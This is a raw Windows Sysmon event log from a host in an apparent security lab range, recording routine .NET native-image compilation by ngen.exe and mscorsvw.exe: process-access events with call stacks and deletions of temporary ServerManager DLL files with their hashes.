21:07:08.464{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9A05-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.449{4DB9351A-A27C-60D3-9905-00000000CF01}5240NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZRFKX0QXW4\Microsoft.Windows.ServerManager.ServerComponentManager.ni.dll.auxMD5=BC3CB15FF075C649A0EBE1C6C72C3B2B,SHA256=7B514EC5AC4E5334B207339206555AD20A6273A85696B800CCEB46C9E68FC585,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.449{4DB9351A-A27C-60D3-9905-00000000CF01}5240NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZRFKX0QXW4\Microsoft.Windows.ServerManager.ServerComponentManager.ni.dllMD5=CB2FF83EA072C52DA777A5A9298D5EC4,SHA256=577011EDAC836C38B6C2180AB03BBB0235E4C78ADC835842C6ABE78698FD27E6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.433{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9905-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.402{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9905-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.402{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9905-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.402{4DB9351A-A27C-60D3-9805-00000000CF01}5624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MFED4NLRI1\Microsoft.Windows.ServerManager.ServerComponentDeploymentWizard.ni.dll.auxMD5=0B1527DD1574E2038222A6F553B3426E,SHA256=EB619300F854D8506F6D5934138E402ECB1378BF477243C3E8912050A16ED859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.402{4DB9351A-A27C-60D3-9805-00000000CF01}5624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MFED4NLRI1\Microsoft.Windows.ServerManager.ServerComponentDeploymentWizard.ni.dllMD5=9DCE5EAB1FC5080E651358D55CF9BD5C,SHA256=B0B2B17184A01A4A4A6B3A94C461A2284FEA573CE7C7C0EC7164DE4CD916F9E8,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.339{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9805-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.324{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9805-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.324{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9805-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.324{4DB9351A-A27C-60D3-9705-00000000CF01}7128NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GNXQMK8O2T\Microsoft.Windows.ServerManager.RemoteAccess.Plugin.ni.dll.auxMD5=51B70DA819B6EF9AB5198CE129524191,SHA256=F2438EC26B05D6BAA643A86AEF5C67E152E8268450ED3F24EAEE7128AE8FF625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.308{4DB9351A-A27C-60D3-9705-00000000CF01}7128NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GNXQMK8O2T\Microsoft.Windows.ServerManager.RemoteAccess.Plugin.ni.dllMD5=34DBA76A1B73F25F28125B1635B6538B,SHA256=EA4AB56BADC2DD99C9543F8D13DF3310CD4945C01874CFDA238038B6AC8F6075,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.292{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9705-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.277{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9705-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.277{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9705-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.277{4DB9351A-A27C-60D3-9605-00000000CF01}6748NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M4IEYWO35Z\Microsoft.Windows.ServerManager.PrintingServer.Plugin.ni.dll.auxMD5=A1D21C8210A690DA511F0B3DC61AB6EF,SHA256=287191966D2276B15B445397132009B47F3E4E27655A9502E09831ADFC80885A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.261{4DB9351A-A27C-60D3-9605-00000000CF01}6748NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M4IEYWO35Z\Microsoft.Windows.ServerManager.PrintingServer.Plugin.ni.dllMD5=2AD2EE17079DCE99E592B23AA2DC75EC,SHA256=89C4CDD9FFD30AA363A0CFCBC1A7E06AED80B9BFC3BE167950B68F75E4C18B7F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.246{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9605-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.230{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9605-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.230{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9605-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.230{4DB9351A-A27C-60D3-9505-00000000CF01}2612NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QPPN5UXTV5\Microsoft.Windows.ServerManager.PowerShell.ni.dll.auxMD5=09FF5B70DA69DA5F851CCE5F083EAD81,SHA256=E19F2DA5295B8621B1D36879C0089179139C63E4EFFDC633843E1A9ECFBB284B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.230{4DB9351A-A27C-60D3-9505-00000000CF01}2612NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QPPN5UXTV5\Microsoft.Windows.ServerManager.PowerShell.ni.dllMD5=37EA091A23A68C8D31190ED23EE90072,SHA256=B7C58CC32BB7FF0B62F7AC5ABAD4DCB9D1102CA585A67295A5AF13B573B2F682,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.199{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-9505-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.199{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFDE73DD564F9FAE9E7A16B502C479D8,SHA256=10EC9479ABE54885FF3578F42F169E03E6847C72DEDAE03CD19F8FFF594B13D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.199{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3434CB68613F6B82E7207A5A8758F920,SHA256=39D817DF3C9F21F2EC746E7788773F4C901FB5D5A9C919399F32891D2174D11F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.183{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-9505-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.183{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-9505-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.183{4DB9351A-A27B-60D3-9405-00000000CF01}6956NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I5G8ENQIFZ\Microsoft.Windows.ServerManager.Plugins.Ipam.ni.dll.auxMD5=684B522C679E7490A12E601687A3B47A,SHA256=61974EDBEB9B6628BD34840071A55B82C4FE02A03CEE6F9A1BCA36AB71920715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.183{4DB9351A-A27B-60D3-9405-00000000CF01}6956NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I5G8ENQIFZ\Microsoft.Windows.ServerManager.Plugins.Ipam.ni.dllMD5=CC2677F7176569429A96B8A8AF0410DF,SHA256=2E9A48736534389F55016D3486111F572CFA66E39E736670F7285DF38A7041D3,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000023397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 